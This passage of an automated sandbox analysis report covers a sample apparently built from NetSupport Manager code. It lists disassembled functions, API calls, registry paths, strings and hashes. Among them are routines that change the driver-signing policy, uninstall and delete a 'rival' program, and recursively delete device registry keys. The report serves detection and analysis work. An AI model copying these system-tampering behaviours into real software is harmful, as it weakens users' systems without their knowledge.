                                                                                                                        • RegSetValueExW.ADVAPI32(?,nssCurrConfig,00000000,00000001,?,?,?,?,0002001F,00000000,00000000,80000001,?,00020019), ref: 00AE4CD4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Valuewsprintf$AllocateCreateDeleteEnumHeapOpen__wcsicoll_free_malloc
                                                                                                                        • String ID: %s\ConfigList\%s$@$CurrConfig$IsA()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$nssCurrConfig
                                                                                                                        • API String ID: 3817632105-2895001147
                                                                                                                        • Opcode ID: 9b956b61fb6e68181d682dac09590f6a828e9e374d2f844d077893699a6ad7fc
                                                                                                                        • Instruction ID: 24fad8a95ad97ae6008c7f541c95aa6c6786e0c924623509244b6fafc81c3899
                                                                                                                        • Opcode Fuzzy Hash: 9b956b61fb6e68181d682dac09590f6a828e9e374d2f844d077893699a6ad7fc
                                                                                                                        • Instruction Fuzzy Hash: FD814FB1900219AFDB20DB54CC85BEEB7BCEF95314F1041D9E609A7281EB74AE84CB95
                                                                                                                        Function 00B2E633 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 153sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcschr.LIBCMT ref: 00B2E1F3
                                                                                                                        • _wcschr.LIBCMT ref: 00B2E216
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000100,00B8CB80), ref: 00B2E682
                                                                                                                        • PostMessageW.USER32(?,000003E1,?,00000000), ref: 00B2EDE1
                                                                                                                        • DestroyWindow.USER32(?), ref: 00B2EDEE
                                                                                                                        • _fputs.LIBCMT ref: 00B2EE3D
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00B2EE58
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$CurrentDestroyDirectoryMessagePostSleepWindow_fputs
                                                                                                                        • String ID: Created main window %08x$Done:$Exit$OK$Restart$winexec.ok
                                                                                                                        • API String ID: 3059877598-3127719662
                                                                                                                        • Opcode ID: 95709d90547e2bca8639a88d6cf5818c7f5bf41b8be570525f07de05fad28789
                                                                                                                        • Instruction ID: e357140e06d6daf90becdea0e0f6b04faabbe8a0d798b9588b58156e962b057d
                                                                                                                        • Opcode Fuzzy Hash: 95709d90547e2bca8639a88d6cf5818c7f5bf41b8be570525f07de05fad28789
                                                                                                                        • Instruction Fuzzy Hash: A4512BB2D40221CBDB30AF69BC52A6A32F4EB14341F0545F5F46D972E1EF708981CBA2
                                                                                                                        Function 00B2AED0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 146registryprocesssynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00B2AF0A
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,UninstallString,00000000,?,?,?), ref: 00B2AF5D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B2AF68
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 00B2B07D
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        • _memset.LIBCMT ref: 00B2AFAD
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B2AFE2
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B2B01C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2B02F
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2B038
                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00B2B04D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$HandleOpenwsprintfwvsprintf$CreateDeleteLoadLocalObjectProcessQuerySingleStringTimeValueWait_malloc_memset
                                                                                                                        • String ID: D$NukeRival : %s$UninstallString
                                                                                                                        • API String ID: 3563785016-3656226284
                                                                                                                        • Opcode ID: 37c1cfa9deaf66788a8f0dcfc168aff5fb0647b623bf544e467ab88478240624
                                                                                                                        • Instruction ID: 4a0c0548fccffcc0136ca8ff88d2eaf4de5f0a210e067ce3c2f7bb1f218aa8ad
                                                                                                                        • Opcode Fuzzy Hash: 37c1cfa9deaf66788a8f0dcfc168aff5fb0647b623bf544e467ab88478240624
                                                                                                                        • Instruction Fuzzy Hash: 4F41A5B5A10229ABDB20DBA4EC49FEB73BCEB44700F1041D9FA1DA7191DEB45E44CB91
                                                                                                                        Function 00AFEB30 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118registrysleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Driver Signing,00000000,000F003F,?), ref: 00AFEB4F
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?), ref: 00AFEB77
                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000004,?,00000004,?,Policy,00000000,?,?,?), ref: 00AFEBA4
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Driver Signing,00000000,000F003F,?), ref: 00AFEBE1
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?), ref: 00AFEC0D
                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000003,?), ref: 00AFEC3C
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00AFEC76
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$OpenQuery$Sleep
                                                                                                                        • String ID: Policy$Software\Microsoft\Driver Signing$cupol %d$cupol err, e=%d$lmpol %d$lmpol err, e=%d
                                                                                                                        • API String ID: 3131223082-2395713291
                                                                                                                        • Opcode ID: 8d0285edb049a283b2edb478305695b9fadf6c25d6d0b4a4ea656fed8aa71abc
                                                                                                                        • Instruction ID: 3d2e06f3645eacb4645eb72fe01fe10cd78b2c913d82406fff2023ec07f98b5b
                                                                                                                        • Opcode Fuzzy Hash: 8d0285edb049a283b2edb478305695b9fadf6c25d6d0b4a4ea656fed8aa71abc
                                                                                                                        • Instruction Fuzzy Hash: 5C415AB1640309BFEB30CF94DC85FA677ECEB18B45F004159F649971A0D7B4A945CBA2
                                                                                                                        Function 00AFB1D0 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 63registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\DeviceClasses,00000000,0002001F,?), ref: 00AFB1F1
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB218
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFB224
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB22E
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Enum,00000000,0002001F,?), ref: 00AFB24B
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB26C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFB278
                                                                                                                          • Part of subcall function 00AFB0E0: RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 00AFB10B
                                                                                                                          • Part of subcall function 00AFB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00AFB14B
                                                                                                                          • Part of subcall function 00AFB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 00AFB196
                                                                                                                          • Part of subcall function 00AFB0E0: RegCloseKey.ADVAPI32(?), ref: 00AFB1A3
                                                                                                                          • Part of subcall function 00AFB0E0: RegDeleteKeyW.ADVAPI32(?,?), ref: 00AFB1AB
                                                                                                                        Strings
                                                                                                                        • SYSTEM\CurrentControlSet\Enum, xrefs: 00AFB241
                                                                                                                        • Failed to open key: HKLM\SYSTEM\CurrentControlSet\Control\DeviceClasses (%d), xrefs: 00AFB229
                                                                                                                        • {7a0787c8-fa7e-4c06-861d-593b3129b14c}, xrefs: 00AFB200
                                                                                                                        • {6B1D1EAB-FF54-4ee9-B9EE-E297404C12A5}, xrefs: 00AFB254
                                                                                                                        • SYSTEM\CurrentControlSet\Control\DeviceClasses, xrefs: 00AFB1E7
                                                                                                                        • RecurseDeleteKey FAILED (%d), xrefs: 00AFB213, 00AFB267
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen_wprintf$Enum$Delete
                                                                                                                        • String ID: Failed to open key: HKLM\SYSTEM\CurrentControlSet\Control\DeviceClasses (%d)$RecurseDeleteKey FAILED (%d)$SYSTEM\CurrentControlSet\Control\DeviceClasses$SYSTEM\CurrentControlSet\Enum${6B1D1EAB-FF54-4ee9-B9EE-E297404C12A5}${7a0787c8-fa7e-4c06-861d-593b3129b14c}
                                                                                                                        • API String ID: 2065481808-1050689862
                                                                                                                        • Opcode ID: 8d1c5f88ed99f4e64045f5c5577771253406aacee28dc4e698a1eca3e8ca35cc
                                                                                                                        • Instruction ID: a01d4f90d9b5248353917428d7c8d777e49e3e913ea68f6649f9b5904aa774cd
                                                                                                                        • Opcode Fuzzy Hash: 8d1c5f88ed99f4e64045f5c5577771253406aacee28dc4e698a1eca3e8ca35cc
                                                                                                                        • Instruction Fuzzy Hash: 9F01C876A5021CB6EA1097D4AD43FBE72BCDB54741F200094FF04E21D2EBA4AE0057B1
                                                                                                                        Function 00B09060 Relevance: 21.3, APIs: 14, Instructions: 288COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B09091
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B090A1
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B0914E
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B09155
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B0917C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Object$DeleteFreeLockUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1970483154-0
                                                                                                                        • Opcode ID: 75aa6a97788406a18e766a70095a8915ef42851fa4f75560c6e4cd34529028a3
                                                                                                                        • Instruction ID: 201f4434819588a6a7b27c1976142e95e0541fea04639deda597559a34c8599b
                                                                                                                        • Opcode Fuzzy Hash: 75aa6a97788406a18e766a70095a8915ef42851fa4f75560c6e4cd34529028a3
                                                                                                                        • Instruction Fuzzy Hash: CAB1C771E04259AFCB15CFA8D8859EEBFF5EF59300F188199E844AB392D734D905CBA0
                                                                                                                        Function 00B11190 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 181COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$__wcsicoll__wcsnicmp_fgetws
                                                                                                                        • String ID: .scp$IsA()$Scripts.nsm$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        • API String ID: 218992925-33230323
                                                                                                                        • Opcode ID: 50225db49434a829f6f26b931bbbe7a8b77861e4e226355a6a434a55d3c921f0
                                                                                                                        • Instruction ID: 5340f17ebc52850524724736fe746c4a569f10e27ad8614f70e8f7027864768e
                                                                                                                        • Opcode Fuzzy Hash: 50225db49434a829f6f26b931bbbe7a8b77861e4e226355a6a434a55d3c921f0
                                                                                                                        • Instruction Fuzzy Hash: 5A51E271A00302ABDB10EB24EC52BA673E4EF95700F1445E8F909DB296FA75E944CB99
                                                                                                                        Function 00B22440 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 128registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,00B71B70,?), ref: 00B2247C
                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000041), ref: 00B224AE
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00B224ED
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B22505
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,00B71B58), ref: 00B2251E
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B225A3
                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000001,?,00000041), ref: 00B225BA
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B225D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumOpenwsprintf$DeleteLocalTimeValue__wcsicoll_mallocwvsprintf
                                                                                                                        • String ID: HackNetMeeting
                                                                                                                        • API String ID: 943488453-1163810582
                                                                                                                        • Opcode ID: df2d53d3b83172b46db29bc58fc984f10f424d24326be89395a0a62334e4867a
                                                                                                                        • Instruction ID: ad6c60e8bc69e289b3b27981ba38cd72fe927192b23aca681c7c515ddddced55
                                                                                                                        • Opcode Fuzzy Hash: df2d53d3b83172b46db29bc58fc984f10f424d24326be89395a0a62334e4867a
                                                                                                                        • Instruction Fuzzy Hash: E3412171A00128ABDB24DB55DC46FEA73B8FB58700F4085D9F609D7150DEB4AE85CFA1
                                                                                                                        Function 00B14540 Relevance: 21.1, APIs: 14, Instructions: 117windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B14550
                                                                                                                        • GetDC.USER32(00000000), ref: 00B14579
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B14588
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B1458D
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B145A5
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B145B0
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B145BE
                                                                                                                        • StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00B1460C
                                                                                                                        • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00B14624
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1462F
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1463A
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B14647
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B1464A
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B1464F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3950507155-0
                                                                                                                        • Opcode ID: 3971abfdbd5ad0a4d10c6ff87728921905f3cbd7c3b0563356b2398d928bf73b
                                                                                                                        • Instruction ID: f49a4c7f8d6bfffaa854a0a63be53478403aea8b6e3295c134d181ed06fbdc98
                                                                                                                        • Opcode Fuzzy Hash: 3971abfdbd5ad0a4d10c6ff87728921905f3cbd7c3b0563356b2398d928bf73b
                                                                                                                        • Instruction Fuzzy Hash: 2541D9B5A00209BFEB14DFA4DC89FBF7BBDEB59711F104159F905A3290DAB4AD408B60
                                                                                                                        Function 00B2E2AC Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 114sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep_wcschr$DestroyMessagePostWindow_fputs
                                                                                                                        • String ID: Done:$Exit$OK$Restart$winexec.ok
                                                                                                                        • API String ID: 2961146616-2848714714
                                                                                                                        • Opcode ID: cf517f40f6d1f21bc97d02bd784e7c8c7087893266d92670f205baaef7733399
                                                                                                                        • Instruction ID: 3d4eb8d2938e61d92796f3c3725584edf0baae30d6b1d766126a794ded5f708f
                                                                                                                        • Opcode Fuzzy Hash: cf517f40f6d1f21bc97d02bd784e7c8c7087893266d92670f205baaef7733399
                                                                                                                        • Instruction Fuzzy Hash: 07312872D4122097DB307B69BC86E6E32F4EB40710F0946F5F46E572D2EEB0998586A3
                                                                                                                        Function 00B1A490 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 96keyboardlibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00B1A4AD
                                                                                                                        • wsprintfW.USER32 ref: 00B1A4CF
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00B1A4DF
                                                                                                                          • Part of subcall function 00B155B0: GetTickCount.KERNEL32 ref: 00B15618
                                                                                                                        • GetModuleHandleW.KERNEL32(NSMTRACE.DLL), ref: 00B1A4F7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceFlush), ref: 00B1A507
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00B1A54B
                                                                                                                        • GetVersion.KERNEL32 ref: 00B1A556
                                                                                                                        • SetLastError.KERNEL32(?), ref: 00B1A57D
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00B1A598
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugErrorLastOutputString$AddressCountHandleModuleProcStateTickVersionwsprintf
                                                                                                                        • String ID: Exception caught at %x. Trying minidump.$NSMTRACE.DLL$NSMTraceFlush
                                                                                                                        • API String ID: 521685582-1300527790
                                                                                                                        • Opcode ID: c9c3026bec44e34d67d5bdd31f94c0bf9571d4bc054616581c049c69b2bb9a53
                                                                                                                        • Instruction ID: fecb7fb938b77f96106cd887c91967e842f11a3de755e5b74e08d7320cf4ceff
                                                                                                                        • Opcode Fuzzy Hash: c9c3026bec44e34d67d5bdd31f94c0bf9571d4bc054616581c049c69b2bb9a53
                                                                                                                        • Instruction Fuzzy Hash: 6C31A5B1901204ABDB10EBA4DC8DBDA77B9EF14700F4081E6F519D72D2EE74A940CB92
